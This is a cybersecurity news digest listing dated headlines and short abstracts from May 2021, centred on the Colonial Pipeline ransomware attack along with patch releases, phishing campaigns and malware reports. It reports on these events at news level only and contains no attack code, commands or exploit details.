The Hill

May 11, 2021 – Vulnerabilities

Wormable Windows Bug Opens Door to DoS, RCE Full Text

Abstract Microsoft’s May 2021 Patch Tuesday updates include fixes for four critical security vulnerabilities.

Threatpost

May 11, 2021 – Phishing

Zix tricks: Phishing campaign creates false illusion that emails are safe Full Text

Abstract The malicious scheme hides behind multiple layers of redirect links in order to confuse security systems.

SCMagazine

May 11, 2021 – Business

GitHub Prepares to Move Beyond Passwords Full Text

Abstract GitHub adds support for FIDO2 security keys for Git over SSH to fend off account hijacking and further its plan to stick a fork in the security bane of passwords.

Threatpost

May 11, 2021 – Government

Government says Colonial Pipeline has not shared data on hack Full Text

Abstract The Department of Homeland Security’s top cyber agency said Tuesday that it has not yet received important technical information from Colonial Pipeline regarding the crippling hack that led it to shut down a key fuel pipeline last week.

The Hill

May 11, 2021 – Government

Katko probes federal oversight of oil and gas industry cybersecurity Full Text

Abstract House Homeland Security Committee ranking member John Katko (R-N.Y.) on Tuesday dug into federal oversight of oil and gas sector cybersecurity in the wake of the shutdown of the Colonial Pipeline after a ransomware attack last week. 

The Hill

May 11, 2021 – Breach

Kansas Identity Theft Spike Could Be Linked to Data Breach Full Text

Abstract Alleged data breach at Kansas Department of Labor may account for state leading national unemployment fraud stats

Infosecurity Magazine

May 11, 2021 – Outage

Southeast sees gas shortages amid pipeline shutdown Full Text

Abstract Parts of the Southeastern U.S. are seeing gasoline shortages following a cyberattack that shut down Colonial Pipeline.

The Hill

May 11, 2021 – Vulnerabilities

Hackers Leverage Adobe Zero-Day Bug Impacting Acrobat Reader Full Text

Abstract A patch for Adobe Acrobat, the world’s leading PDF reader, fixes a vulnerability under active attack affecting both Windows and macOS systems that could lead to arbitrary code execution.

Threatpost

May 11, 2021 – Hacker

Researcher hacked Apple AirTag two weeks after its launch Full Text

Abstract Apple AirTag was launched less than two weeks ago, but a security researcher already claims to have hacked it. The Apple AirTag has been available for just a couple of weeks and the hacking community is already working on it to demonstrate...

Security Affairs

May 11, 2021 – Ransomware

Cuba Ransomware Joining Hands with Hancitor Malware Full Text

Abstract The Cuba ransomware group and the operators behind the Hancitor downloader have reportedly united for easy access to compromised corporate networks. For years, Cuba ransomware has been in and out of the ransomware game; it came to the limelight after the AFTS attack.

Cyware Alerts - Hacker News

May 11, 2021 – Hacker

Sophisticated Cyber Group Designs Evasive Toolsets Full Text

Abstract Researchers from Kaspersky uncover an ongoing espionage campaign called TunnelSnake targeting Asian and African diplomats and some high-profile organizations. The attack is being allegedly conducted by Chinese actors.

Cyware Alerts - Hacker News

May 11, 2021 – Malware

Fake Chrome App Anchors Rapidly Worming ‘Smish’ Cyberattack Full Text

Abstract An ingenious attack on Android devices self-propagates, with the potential for a range of damage.

Threatpost

May 11, 2021 – Vulnerabilities

Google Patches 19 Vulnerabilities With Chrome 90 Update Full Text

Abstract Chrome components affected by these issues include Web App Installs, Offline, Media Feeds, Aura, Tab Groups, Notifications, V8, Autofill, File API, History, Reader Mode, Payments, and Tab Strip.

Security Week

May 11, 2021 – Hacker

Roaming Mantis Evolving and Improvising its Smishing Campaign Full Text

Abstract The Roaming Mantis threat actor group has improved its attack tactic to steal more funds while evading detection. The group is now using whitelisting to spread two new malware families. Researchers suspect that this could be the work of more than one group of attackers working together.

Cyware Alerts - Hacker News

May 11, 2021 – Privacy

Germany Bans Facebook from Processing WhatsApp Data Full Text

Abstract Privacy regulator bars Facebook from collecting data on WhatsApp users in Germany

Infosecurity Magazine

May 11, 2021 – Vulnerabilities

Microsoft May 2021 Patch Tuesday fixes 55 flaws, 3 zero-days Full Text

Abstract Today is Microsoft's May 2021 Patch Tuesday, and with it come three zero-day vulnerabilities, so Windows admins will be rushing to apply updates.

BleepingComputer

May 11, 2021 – Ransomware

Project Signal: A Ransomware Operation Sponsored by Iran Full Text

Abstract Iran's Islamic Revolutionary Guard Corps has been accused of running a state-sponsored ransomware operation through a contracting company known as Emen Net Pasargard.

Cyware Alerts - Hacker News

May 11, 2021 – Government

AGs Question Safety of Kids-Only Instagram Full Text

Abstract Facebook asked to drop plans to create an Instagram for children under the age of 13

Infosecurity Magazine

May 11, 2021 – Business

Cycode raises $20M to secure DevOps pipelines Full Text

Abstract Israeli security startup Cycode, which specializes in securing the DevOps pipeline, today announced that it has raised a $20 million Series A funding round led by Insight Partners.

TechCrunch

May 11, 2021 – Solution

Microsoft Defender ATP now secures networked Linux, macOS devices Full Text

Abstract Microsoft has added support for identifying and assessing the security configurations of Linux and macOS endpoints on enterprise networks using Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection).

BleepingComputer

May 11, 2021 – Vulnerabilities

Adobe fixes Reader zero-day vulnerability exploited in the wild Full Text

Abstract Adobe has released a massive Patch Tuesday security update that fixes vulnerabilities in twelve different applications, including one actively exploited vulnerability in Adobe Reader.

BleepingComputer

May 11, 2021 – Vulnerabilities

Apple Execs Chose to Keep a Hack of 128 Million iPhones Quiet Full Text

Abstract The infections were the result of legitimate developers writing apps using a counterfeit and malicious copy of Xcode, Apple’s iOS and OS X app development tool, dubbed XcodeGhost.

Wired

May 11, 2021 – APT

10 APT groups that joined the MS Exchange exploitation party Full Text

Abstract Research by ESET showed that the vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 were exploited by at least 10 APT groups since the release of the patches.

Cyber News

May 11, 2021 – Ransomware

Is It Really 85 Percent? Full Text

Abstract A commonly cited statistic about private ownership of U.S. infrastructure has popped up again after the Colonial Pipeline ransomware report. But where does it actually come from?

Lawfare

May 11, 2021 – Vulnerabilities

Siemens Addresses 60 Vulnerabilities Introduced by Third-Party Components Full Text

Abstract Of the 14 advisories published this week, nine cover 60 vulnerabilities related to third-party components. The remaining advisories cover only 7 flaws that are specific to Siemens products.

Security Week

May 11, 2021 – Malware

Apple was aware that XcodeGhost impacted 128 Million iOS Users in 2015 Full Text

Abstract Court documents revealed that the infamous XcodeGhost malware, which has been active since 2015, infected 128 million iOS users. Documents provided in a court case that sees Epic Games v. Apple Inc. revealed that the XcodeGhost malware impacted...

Security Affairs

May 11, 2021 – Ransomware

WATCH: FBI cyber division chief details how his team will support businesses in the ransomware battle Full Text

Abstract As Colonial Pipeline struggles to return to operations amid a crippling ransomware attack, how will law enforcement leverage tech, partnership with industry, and policy to manage the threat? During a recent SC Media eSummit on ransomware, Herb Stapleton, cyber division section chief at the FBI, offered details on lessons that emerged during 2020, and how they will shape efforts in 2021 to respond to attacks.

SCMagazine

May 11, 2021 – Government

#CYBERUK21: Home Secretary Outlines UK Government’s Plan to Tackle Growing Cyber-Threats Full Text

Abstract UK Home Secretary, Priti Patel, speaks during CYBERUK 2021

Infosecurity Magazine

May 11, 2021 – Ransomware

200K Veterans’ Medical Records Likely Stolen by Ransomware Gang Full Text

Abstract Analyst finds ransomware evidence, despite a contractor’s denial of compromise.

Threatpost

May 11, 2021 – Ransomware

Ransomware gang leaks data from Metropolitan Police Department Full Text

Abstract Babuk ransomware operators have leaked what they claim are personal files belonging to police officers from the Metropolitan Police Department after negotiations went stale.

BleepingComputer

May 11, 2021 – Breach

University of California Confirms Theft of Personal Information in Cyberattack Involving Accellion FTA Service Full Text

Abstract The University of California (UC) this week confirmed that personal information was stolen in a cyberattack involving the Accellion File Transfer Appliance (FTA) service.

Security Week

May 11, 2021 – Business

Fraud prevention firm Arkose Labs raises $70M Full Text

Abstract Arkose Labs, a startup developing a platform to detect and mitigate online fraud, today announced that it raised $70 million in a funding round led by SoftBank Vision Fund 2.

Venture Beat

May 11, 2021 – Ransomware

DarkSide Wanted Money, Not Disruption from Colonial Pipeline Attack Full Text

Abstract Statement by the ransomware gang suggests that the incident that crippled a major U.S. oil pipeline may not have exactly gone to plan for overseas threat actors.

Threatpost

May 11, 2021 – Vulnerabilities

Compsci boffin publishes proof-of-concept code for 54-year-old zero-day in Universal Turing Machine Full Text

Abstract A computer science professor from Sweden has discovered an arbitrary code execution vulnerability in the Universal Turing Machine, one of the earliest computer designs in history.

The Register

May 11, 2021 – Government

White House monitoring fuel supply shortages in southeastern US from pipeline cyberattack Full Text

Abstract The Biden administration is monitoring fuel supply shortages in the southeastern United States after the Colonial Pipeline ransomware attack, the White House said in a statement late Monday.

The Hill

May 11, 2021 – General

LIVE Webinar — The Rabbit Hole of Automation Full Text

Abstract The concept of automation has taken on a life of its own in recent years. The idea is nothing new, but the current interest in automation is a mix of both hype and innovation. On the one hand, it's much easier today to automate everything from small processes to massive-scale tasks than it's ever been before. On the other hand, are we really prepared to hand the reins over to completely automated systems, and should we? There are areas in security operations where automation is already a critical component. In terms of analytics and parsing through ever-expanding data flows, it's impossible for most teams to keep up without impacting other areas of their jobs. Automated systems help us make sense of threats much faster and more reliably. However, automation isn't a cure-all (just yet). A new live webinar from XDR provider Cynet dives into the topic more in depth ( register here ). The webinar explores automation as it exists today in the cybersecurity industry. Led

The Hacker News

May 11, 2021 – General

#CYBERUK21: We Have Reached a Moment of Reckoning in Cybersecurity, Says GCHQ Director Full Text

Abstract Collaboration and diversity are needed to tackle the tech challenges

Infosecurity Magazine

May 11, 2021 – Solution

Google open sources cosign tool for verifying containers Full Text

Abstract Google has released a new open-source tool called cosign that could allow administrators to sign and verify container images. Google has released a new open-source tool called cosign that allows administrators to sign and verify container images; it was developed...

Security Affairs

May 11, 2021 – Vulnerabilities

Vulnerability attacks weakness in Microsoft Azure virtual machine extensions Full Text

Abstract The flaw, which Microsoft patched in March, would allow an attacker to escalate privileges and access sensitive user data.

SCMagazine

May 11, 2021 – Vulnerabilities

Researchers Pawn Electric Cars to Circumvent Payment for Charging Stations and Manipulate Car Battery Full Text

Abstract Tencent's Blade Team, a security research group, showed they could circumvent payment schemes at electric vehicle charging stations by using a Raspberry Pi to conduct the attack.

The Register

May 11, 2021 – 5G

U.S. Intelligence Agencies Warn About 5G Network Weaknesses Full Text

Abstract Inadequate implementation of telecom standards, supply chain threats, and weaknesses in systems architecture could pose major cybersecurity risks to 5G networks, potentially making them a lucrative target for cybercriminals and nation-state adversaries to exploit for valuable intelligence. The analysis, which aims to identify and assess risks and vulnerabilities introduced by 5G adoption, was published on Monday by the U.S. National Security Agency (NSA), in partnership with the Office of the Director of National Intelligence (ODNI) and the Department of Homeland Security's (DHS) Cybersecurity and Infrastructure Security Agency (CISA). "As new 5G policies and standards are released, there remains the potential for threats that impact the end-user," the report said. "For example, nation states may attempt to exert undue influence on standards that benefit their proprietary technologies and limit customers' choices to use other equipment or software." S

The Hacker News

May 11, 2021 – General

Amazon: We Blocked 10 Billion Bad Listings in 2020 Full Text

Abstract Retail giant reveals major counterfeit threat in new report

Infosecurity Magazine

May 11, 2021 – Ransomware

FBI and Australia ACSC agencies warn of ongoing Avaddon ransomware attacks Full Text

Abstract The FBI and the Australian Cyber Security Centre (ACSC) warn of an ongoing Avaddon ransomware campaign targeting organizations worldwide. The Federal Bureau of Investigation (FBI) and the Australian Cyber Security Centre (ACSC) are warning...

Security Affairs

May 11, 2021 – Privacy

Twitter’s New Tip Jar Feature has Some Privacy Issues Full Text

Abstract As Rachel Tobac of SocialProof Security highlighted in a tweet, if a user sends another a tip via PayPal, the receiver can find out the sender's address by opening the receipt from the tip received.

Softpedia

May 11, 2021 – Malware

Experts warn of a new Android banking trojan stealing users’ credentials Full Text

Abstract Cybersecurity researchers on Monday disclosed a new Android trojan that hijacks users' credentials and SMS messages to facilitate fraudulent activities against banks in Spain, Germany, Italy, Belgium, and the Netherlands. Called "TeaBot" (or Anatsa), the malware is said to be in its early stages of development, with malicious attacks targeting financial apps commencing in late March 2021, followed by a rash of infections in the first week of May against Belgian and Dutch banks. The first signs of TeaBot activity emerged in January. "The main goal of TeaBot is stealing victim's credentials and SMS messages for enabling frauds scenarios against a predefined list of banks," Italian cybersecurity and online fraud prevention firm Cleafy said in a Monday write-up. "Once TeaBot is successfully installed in the victim's device, attackers can obtain a live streaming of the device screen (on demand) and also interact with it via Accessibility Ser

The Hacker News

May 11, 2021 – Ransomware

AXA to Stop Reimbursing Ransom Payments Full Text

Abstract Insurer's move in France could drive cybersecurity improvements

Infosecurity Magazine

May 11, 2021 – Ransomware

Biden: No evidence Russian government is involved in Colonial ransomware attack Full Text

Abstract At a press conference today, President Joe Biden said the US intelligence community has no evidence that the Russian government had any kind of involvement in the Colonial Pipeline hack.

The Record

May 11, 2021 – Government

U.S. Declares Emergency in 17 States Over Fuel Pipeline Cyber Attack Full Text

Abstract The ransomware attack against Colonial Pipeline's networks has prompted the U.S. Federal Motor Carrier Safety Administration (FMCSA) to issue a regional emergency declaration in 17 states and the District of Columbia (D.C.). The declaration provides a temporary exemption to Parts 390 through 399 of the Federal Motor Carrier Safety Regulations (FMCSRs), allowing alternate transportation of gasoline, diesel, and refined petroleum products to address supply shortages stemming from the attack. "Such [an] emergency is in response to the unanticipated shutdown of the Colonial pipeline system due to network issues that affect the supply of gasoline, diesel, jet fuel, and other refined petroleum products throughout the Affected States," the directive said. "This Declaration addresses the emergency conditions creating a need for immediate transportation of gasoline, diesel, jet fuel, and other refined petroleum products and provides necessary relief." The states

The Hacker News

May 11, 2021 – Ransomware

Japanese Manufacturer Yamabiko Targeted by Babuk Ransomware Full Text

Abstract Report suggests threat actors have already come out of retirement

Infosecurity Magazine

May 11, 2021 – Solution

Google Releases Open Source Tool for Verifying Containers Full Text

Abstract Developed in collaboration with Linux Foundation’s sigstore project, the technology company said the motivation for cosign is “to make signatures invisible infrastructure.”

Security Week

May 11, 2021 – Business

GitHub shifts away from passwords with security key support for SSH Git operations Full Text

Abstract When you add a security key to SSH operations, you can use these devices to protect you and your account from accidental exposure, account hijacking, or malware, a GitHub security engineer wrote.

ZDNet

May 11, 2021 – Outage

Cyberattack knocks out RPI computer systems Full Text

Abstract Rensselaer Polytechnic Institute is three days into dealing with a cyberattack that shut down much of its network, impacting the university’s students as they go into finals for the spring semester.

Times Union

May 10, 2021 – Government

Colonial Pipeline attack: What government can do to deter critical infrastructure cybercriminals Full Text

Abstract What does the U.S. do about criminals protected by their own governments? That question becomes more complicated with attacks against critical infrastructure, which is privately owned and operated, but also intrinsically tied to national security. Those distinctions make these companies high-value targets, which many argue are in government’s best interest to protect.

SCMagazine

May 10, 2021 – Attack

5 takeaways from attack on Colonial Pipeline Full Text

Abstract The Colonial Pipeline, which transports about 45 percent of fuel consumed on the East Coast, shut down over the weekend due to a ransomware attack.

The Hill

May 10, 2021 – General

Hillicon Valley: Colonial Pipeline attack underscores US energy’s vulnerabilities | Biden leading ‘whole-of-government’ response to hack | Attorneys general urge Facebook to scrap Instagram for kids Full Text

Abstract The nation’s oil and gas sector was left reeling from a ransomware attack late last week that caused Colonial Pipeline to shut down operations that provide around 45 percent of the East Coast’s oil. Officials and experts said Monday that the hack underscored vulnerabilities in the nation’s critical utilities, while the Biden administration launched a “whole-of-government” response to address the crisis. Meanwhile, a group of attorneys general urged Facebook to abandon support for an Instagram for kids platform. 

The Hill

May 10, 2021 – Ransomware

City of Tulsa’s online services disrupted in ransomware incident Full Text

Abstract The City of Tulsa, Oklahoma, has suffered a ransomware attack that forced the City to shut down its systems to prevent the further spread of the malware.

BleepingComputer

May 10, 2021 – Business

CrowdStrike, Google partnership aims to deliver defense-in-depth for hybrid cloud environments Full Text

Abstract CrowdStrike and Google Cloud on Monday announced a series of product integrations to deliver joint customers defense-in-depth security, deeper visibility and workload protection across a hybrid cloud environment. The companies say the integrations will allow for more seamless sharing of telemetry and data between the two security platforms, helping maintain high levels of security across…

SCMagazine

May 10, 2021 – Ransomware

FBI confirmed that Darkside ransomware gang hit Colonial Pipeline Full Text

Abstract The U.S. FBI confirmed that the attack against the Colonial Pipeline over the weekend was launched by the Darkside ransomware gang. The U.S. Federal Bureau of Investigation confirmed that the Colonial Pipeline was shut down due to a cyber attack carried...

Security Affairs

May 10, 2021 – Solution

GitHub now supports security keys when using Git over SSH Full Text

Abstract GitHub has added support for securing SSH Git operations using FIDO2 security keys for added protection from account takeover attempts.

BleepingComputer

May 10, 2021 – Government

Biden leading ‘whole of government’ response to Colonial Pipeline attack Full Text

Abstract President Biden and top administration officials said Monday they are taking a “whole-of-government” approach to both responding to the debilitating ransomware attack on Colonial Pipeline, and to strengthening the security of critical utilities moving forward. 

The Hill

May 10, 2021 – Government

White House: Colonial should be its own ‘first line of defense’ against attacks Full Text

Abstract The White House said that it has been in touch with Colonial since Friday and has offered its assistance mitigating the ransomware, which Colonial has declined. Colonial told the administration it is working with its own cyber team.

SCMagazine

May 10, 2021 – Government

Colonial Pipeline attack spotlights risks of geographically dispersed networks in an industry that is ‘far behind’ Full Text

Abstract One expert noted that the pipeline industry is far behind other sectors, creating a high-risk scenario that can cascade rapidly.

SCMagazine

May 10, 2021 – Ransomware

N3TW0RM Ransomware Targeting Israeli Organizations Full Text

Abstract Iranian hackers recently compromised the networks of H&M Israel and other Israeli firms. The operators have threatened to leak 110GB of customer data if the ransom demand of 3 BTC isn't met. N3TW0RM has not been attributed to any group at present.

Cyware Alerts - Hacker News

May 10, 2021 – Policy and Law

Four Confess to ‘Bulletproof Hosting’ Full Text

Abstract Conspirators plead guilty to providing ‘bulletproof hosting’ services to cyber-criminals attacking the US

Infosecurity Magazine

May 10, 2021 – Breach

Data Breach at Law Firm Jones Day Impacts Employee Emails at City of Chicago Full Text

Abstract On Friday, the city of Chicago revealed that some employee emails that were given to Jones Day “as part of an independent inquiry being conducted by the firm” were compromised in the incident.

Security Week

May 10, 2021 – Phishing

Staff Bonus was “Crass” Phishing Simulation Full Text

Abstract "Thank you" email offering bonus to train company employees was a cybersecurity test

Infosecurity Magazine

May 10, 2021 – Phishing

Global BEC Campaign Victimizes Over 120 Organizations via Gift Card Scams Full Text

Abstract In this campaign, attackers targeted a variety of companies in the consumer goods, process manufacturing and agriculture, real estate, discrete manufacturing, and professional services sectors.

Microsoft

May 10, 2021 – Government

White House downplays any supply challenge from pipeline attack Full Text

Abstract The White House said Monday that a cyberattack on Colonial Pipeline, the largest oil supplier in the Northeast United States, has not yet resulted in supply shortages but that officials are monitoring for potential disruptions in the future.

The Hill

May 10, 2021 – Attack

University Cancels Exams After Cyber-Attack Full Text

Abstract America’s oldest technological research university cancels finals following cyber-intrusion

Infosecurity Magazine

May 10, 2021 – Vulnerabilities

AirTag hacked for the first time by security researcher Full Text

Abstract While the regular item tracker opens the Find My website, researchers created a modified item tracker that opens a non-related URL, which could be used for phishing or anything else.

9to5 Mac

May 10, 2021 – Business

Colonial aims to ‘substantially’ restore pipeline operations by end of week Full Text

Abstract The Colonial Pipeline Company said that it hopes to “substantially” restore the operations of its pipeline by the end of the week following a ransomware attack that led to its shutdown. 

The Hill

May 10, 2021 – Ransomware

FBI confirms DarkSide ransomware group behind pipeline hack Full Text

Abstract The FBI confirmed on Monday that criminal ransomware gang Darkside is responsible for the cyberattack on the Colonial Pipeline network.

The Hill

May 10, 2021 – Vulnerabilities

Colonial Pipeline attack underscores US energy’s vulnerability Full Text

Abstract The ransomware attack on Colonial Pipeline, the largest supplier of oil to the Northeast region of the United States, is underscoring just how vulnerable critical U.S. infrastructure is to cybercriminals in a way no previous attack has done, say U.S. officials and experts in the field.

The Hill

May 10, 2021 – Ransomware

US and Australia warn of escalating Avaddon ransomware attacks Full Text

Abstract The Federal Bureau of Investigation (FBI) and the Australian Cyber Security Centre (ACSC) are warning of an ongoing Avaddon ransomware campaign targeting organizations from an extensive array of sectors in the US and worldwide.

BleepingComputer

May 10, 2021 – Ransomware

DarkSide ransomware will now vet targets after pipeline cyberattack Full Text

Abstract The DarkSide ransomware gang posted a new "press release" today stating that they are apolitical and will vet all targets before they are attacked.

BleepingComputer

May 10, 2021 – Ransomware

DarkSide ransomware will start vetting targets after pipeline cyberattack Full Text

Abstract The DarkSide ransomware gang posted a new "press release" today stating that they are apolitical and will vet all targets before they are attacked.

BleepingComputer

May 10, 2021 – Vulnerabilities

Pega Infinity hotfix released after researchers flag critical authentication bypass vulnerability Full Text

Abstract According to the research team – Sam Curry, Justin Rhinehart, Brett Buerhaus, and Maik Robert – CVE-2021-27651 is a critical-risk vulnerability in versions 8.2.1 to 8.5.2 of Pega’s Infinity software.

The Daily Swig

May 10, 2021 – Ransomware

Ransomware gangs get more aggressive against law enforcement Full Text

Abstract Criminal hackers are increasingly using brazen methods to increase pressure on law enforcement agencies to pay ransoms, including threatening to leak highly sensitive information.

AP News

May 10, 2021 – Ransomware

US declares state of emergency after ransomware hits largest pipeline Full Text

Abstract After a ransomware attack on Colonial Pipeline forced the company to shut down 5,500 miles of fuel pipeline, the Federal Motor Carrier Safety Administration (FMCSA) issued a regional emergency declaration affecting 17 states and the District of Columbia.

BleepingComputer

May 10, 2021 – Covid-19

COVID-related Cybercrime in the UK on the Rise Full Text

Abstract More scams were taken down by the UK's cybersecurity agency in the last year compared to the previous three years combined. Coronavirus swindles are fueling the increase.

Softpedia

May 10, 2021 – Privacy

Over 25% Of Tor Exit Relays Spied On Users’ Dark Web Activities Full Text

Abstract An unknown threat actor managed to control more than 27% of the entire Tor network exit capacity in early February 2021, a new study on the dark web infrastructure revealed. "The entity attacking Tor users is actively exploiting tor users since over a year and expanded the scale of their attacks to a new record level," an independent security researcher who goes by the name nusenu said in a write-up published on Sunday. "The average exit fraction this entity controlled was above 14% throughout the past 12 months." It's the latest in a series of efforts undertaken to bring to light malicious Tor activity since December 2019. The attacks, which are said to have begun in January 2020, were first documented and exposed by the same researcher in August 2020. Tor is open-source software for enabling anonymous communication on the Internet. It obfuscates the source and destination of a web request by directing network traffic through a series of relays in or

The Hacker News

May 10, 2021 – General

Malicious UK Website Takedowns Surge 15-Fold in 2020 Full Text

Abstract UK’s Active Cyber Defence program goes from strength-to-strength

Infosecurity Magazine

May 10, 2021 – Ransomware

City of Tulsa is the latest US city hit by ransomware attack Full Text

Abstract The city of Tulsa, Oklahoma, has been hit by a ransomware attack over the weekend that impacted its government's network and shut down its websites. One of the biggest cities in the US by population size, the City of Tulsa, was victim of a ransomware...

Security Affairs

May 10, 2021 – Vulnerabilities

NatWest Bank scheduled payments bug may have cost you money Full Text

Abstract Today, UK-based NatWest Bank has alerted multiple customers of a system error that may have caused many more payments to be debited from customer accounts than the originally agreed-upon amount. The issue impacts standing orders set up between 23rd March 2020 and 24th February 2021.

BleepingComputer

May 10, 2021 – Ransomware

Reported ransomware attack leads to weeks of Aprima EHR outages Full Text

Abstract A reported ransomware attack on the CompuGroup Medical data center partner, MedNetwoRX, has impeded some customers' access to their Aprima electronic health record systems for more than two weeks.

Healthcare IT News

May 10, 2021 – General

Is it still a good idea to require users to change their passwords? Full Text

Abstract For as long as corporate IT has been in existence, users have been required to change their passwords periodically. In fact, the need for scheduled password changes may be one of the most long-standing of all IT best practices. Recently, however, things have started to change. Microsoft has reversed course on the best practices that it has had in place for decades and no longer recommends that organizations require users to change passwords periodically. Organizations are being forced to consider, perhaps for the first time, whether or not requiring periodic password changes is a good idea. Microsoft password reset recommendations. According to Microsoft, requiring users to change their passwords frequently does more harm than good. Humans are notoriously resistant to change. When a user is forced to change their password, they will often come up with a new password that is based on their previous password. A user might, for example, append a number to the end of their password

The Hacker News

May 10, 2021 – Vulnerabilities

UK/US: Patch These 11 Bugs Now to Thwart Russian Spies Full Text

Abstract New report reveals latest SVR tactics

Infosecurity Magazine

May 10, 2021 – Hacker

Threat actors added thousands of Tor exit nodes to carry out SSL stripping attacks Full Text

Abstract Since early 2020, bad actors have added Tor exit nodes to the Tor network to intercept traffic to cryptocurrency-related sites. Starting from January 2020, a threat actor has been adding thousands of malicious exit relays to the Tor network to intercept...

Security Affairs

May 10, 2021 – Ransomware

City of Tulsa Hit by Ransomware Attack Over the Weekend Full Text

Abstract The city of Tulsa, Oklahoma, one of the largest cities in the US, has been hit by a ransomware attack over the weekend that affected the city government’s network and brought down official websites.

The Record

May 10, 2021 – Ransomware

Ransomware Takes Down East Coast Fuel Pipeline Full Text

Abstract Emergency legislation issued after critical infrastructure attack

Infosecurity Magazine

May 10, 2021 – Privacy

WhatsApp will not deactivate accounts for not accepting new privacy terms Full Text

Abstract WhatsApp will not deactivate the accounts of users who don't accept the new privacy policy update that requires sharing data with other companies owned by Facebook. WhatsApp on Friday announced that it will not deactivate accounts of users who don't...

Security Affairs

May 10, 2021 – Government

US Government Passes Emergency Waiver Over Disruptive Cyberattack at Largest Fuel Pipeline Full Text

Abstract Multiple sources have confirmed that the ransomware attack was caused by a cyber-criminal gang called DarkSide, who infiltrated Colonial's network on Thursday and took almost 100GB of data hostage.

BBC

May 10, 2021 – Phishing

Scammers Score $2 Million from WallStreetBets Forum Users Full Text

Abstract A cryptocurrency scam recently pilfered at least $2 million from WallStreetBets enthusiasts, convincing them that they were buying into a new crypto coin connected to the popular memestock.

Gizmodo

May 10, 2021 – Vulnerabilities

Foxit Patches Vulnerability Allowing Attackers to Execute Malware Via PDF Files Full Text

Abstract Successful exploitation of this vulnerability can lead from program crashes and data corruption to the execution of arbitrary code on computers running the vulnerable software.

Heimdal Security

May 10, 2021 – Vulnerabilities

Lemon Duck spreads its wings: Actors target Microsoft Exchange servers, incorporate new TTPs Full Text

Abstract Lemon Duck remains relevant as the operators begin to target Microsoft Exchange servers, exploiting high-profile security vulnerabilities to drop web shells and carry out malicious activities.

Cisco Talos

May 10, 2021 – Deepfake

DefakeHop: A deepfake detection method that tackles adversarial threat detection and recognition Full Text

Abstract US Army researchers developed a deepfake detection method that will enable the creation of soldier technology to support mission-essential tasks such as adversarial threat detection and recognition.

Help Net Security

May 09, 2021 – Policy and Law

Four Plead Guilty to Aiding Cyber Criminals with Bulletproof Hosting Full Text

Abstract Four Eastern European nationals face 20 years in prison for Racketeer Influenced Corrupt Organization (RICO) charges after pleading guilty to providing bulletproof hosting services between 2008 and 2015, which were used by cybercriminals to distribute malware to financial entities across the U.S. The individuals, Aleksandr Grichishkin, 34, and Andrei Skvortsov, 34, of Russia; Aleksandr Skorodumov, 33, of Lithuania; and Pavel Stassi, 30, of Estonia, have been accused of renting their wares to cybercriminal clients, who used the infrastructure to disseminate malware such as Zeus, SpyEye, Citadel, and the Blackhole Exploit Kit that were capable of co-opting victim machines into a botnet, and stealing sensitive information. The deployment of malware caused or attempted to cause millions of dollars in losses to U.S. victims, the U.S. Department of Justice (DoJ) said in a statement on Friday. "A key service provided by the defendants was helping their clients to evade detection by

The Hacker News

May 9, 2021 – Ransomware

CISA MAR report provides technical details of FiveHands Ransomware Full Text

Abstract U.S. CISA has published an analysis of the FiveHands ransomware, the same malware that was analyzed a few days ago by researchers from FireEye’s Mandiant experts. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published an analysis...

Security Affairs

May 9, 2021 – Vulnerabilities

SQL injection issue in Anti-Spam WordPress Plugin exposes User Data Full Text

Abstract ‘Spam protection, AntiSpam, FireWall by CleanTalk’ anti-spam WordPress plugin could expose user sensitive data to an unauthenticated attacker. A Time-Based Blind SQL Injection in ‘Spam protection, AntiSpam, FireWall by CleanTalk’ WordPress...

Security Affairs

May 09, 2021 – Outage

Ransomware Cyber Attack Forced the Largest U.S. Fuel Pipeline to Shut Down Full Text

Abstract Colonial Pipeline, which carries 45% of the fuel consumed on the U.S. East Coast, on Saturday said it halted operations due to a ransomware attack, once again demonstrating how infrastructure is vulnerable to cyberattacks. "On May 7, the Colonial Pipeline Company learned it was the victim of a cybersecurity attack," the company said in a statement posted on its website. "We have since determined that this incident involves ransomware. In response, we proactively took certain systems offline to contain the threat, which has temporarily halted all pipeline operations, and affected some of our IT systems." Colonial Pipeline is the largest refined products pipeline in the U.S., a 5,500 mile (8,851 km) system involved in transporting over 100 million gallons from the Texas city of Houston to New York Harbor. Cybersecurity firm FireEye's Mandiant incident response division is said to be assisting with the investigation, according to reports from Bloomberg

The Hacker News

May 9, 2021 – General

Security Affairs newsletter Round 313 Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. Cloud hosting provider Swiss Cloud suffered a ransomware attack; Hacking a Tesla Model X with a DJI Mavic...

Security Affairs

May 9, 2021 – Denial Of Service

TsuNAME flaw exposes DNS servers to DDoS attacks Full Text

Abstract A flaw in some DNS resolvers, tracked as TsuNAME, can allow attackers to launch DDoS attacks against authoritative DNS servers. Researchers at SIDN Labs (the R&D team of the registry for .nl domains), InternetNZ (the registry for .nz domains),...

Security Affairs

May 08, 2021 – Phishing

Twitter scammers impersonate SNL in Elon Musk cryptocurrency scams Full Text

Abstract Twitter scammers are jumping on Elon Musk's hosting of Saturday Night Live to push cryptocurrency scams to steal people's Bitcoin, Ethereum, and Dogecoin.

BleepingComputer

May 8, 2021 – Outage

Cyberattack Forces Colonial Pipeline to Shut Major Fuel Line Full Text

Abstract A cyberattack forced the shutdown of one of the largest pipelines in the United States, in what appeared to be a significant attempt to disrupt vulnerable energy infrastructure.

New York Times

May 08, 2021 – Outage

Major US pipeline halts operations after cyberattack Full Text

Abstract One of the largest pipelines in the U.S. was forced to halt some of its operations Friday after a crippling cyberattack on its energy infrastructure.

The Hill

May 8, 2021 – Ransomware

Major U.S. Pipeline Crippled in Ransomware Attack Full Text

Abstract Colonial Pipeline Company says it is the victim of a cyberattack that forced the major provider of liquid fuels to the East Coast to temporarily halt all pipeline operations.

Threatpost

May 08, 2021 – Accident

Largest U.S. pipeline shuts down operations after ransomware attack Full Text

Abstract Colonial Pipeline, the largest fuel pipeline in the United States, has shut down operations after suffering what is reported to be a ransomware attack.

BleepingComputer

May 08, 2021 – Privacy

Facebook Will Limit Your WhatsApp Features For Not Accepting Privacy Policy Full Text

